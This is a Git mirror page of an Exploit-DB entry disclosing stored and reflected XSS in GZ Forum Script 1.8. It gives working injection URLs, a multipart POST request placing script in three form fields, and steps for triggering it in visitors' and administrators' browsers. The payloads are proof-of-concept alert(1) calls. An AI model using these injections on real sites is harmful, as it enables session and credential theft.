bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51559.txt
Exploit-DB ef9b4e5962 DB: 2023-07-04 
20 changes to exploits/shellcodes/ghdb

TP-Link TL-WR940N V4 - Buffer OverFlow

D-Link DAP-1325 - Broken Access Control

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

FuguHub 8.1 - Remote Code Execution

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Rukovoditel 3.4.1 - Multiple Stored XSS

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

spip v4.1.10 - Spoofing Admin account

Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

WBCE CMS 1.6.1 - Open Redirect & CSRF
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS

WP AutoComplete 1.0.4 - Unauthenticated SQLi
2023-07-04 00:16:26 +00:00

73 lines
No EOL
2.5 KiB
Text
Raw Blame History

# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/gz-forum-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Release Notes:
Reflected XSS:
The attacker can send to victim a link containing a malicious URL in an email or
instant message can perform a wide variety of actions, such as stealing the victim's
session token or login credentials
Stored XSS
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
## Reflected XSS
Path: /preview.php
GET 'catid' parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a
Path: /preview.php
GET 'topicid' parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2
## Stored XSS
-----------------------------------------------
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="free_name"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic_message"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325--
-----------------------------------------------
POST parameter 'free_name' is vulnerable to XSS
POST parameter 'topic' is vulnerable to XSS
POST parameter 'topic_message' is vulnerable to XSS
## Steps to Reproduce:
1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)
2. Inject your [XSS Payload] in "Name"
3. Inject your [XSS Payload] in "Topic Title "
4. Inject your [XSS Payload] in "Topic Message"
5. Submit
4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on
5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)
6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
Reference in a new issue View git blame Copy permalink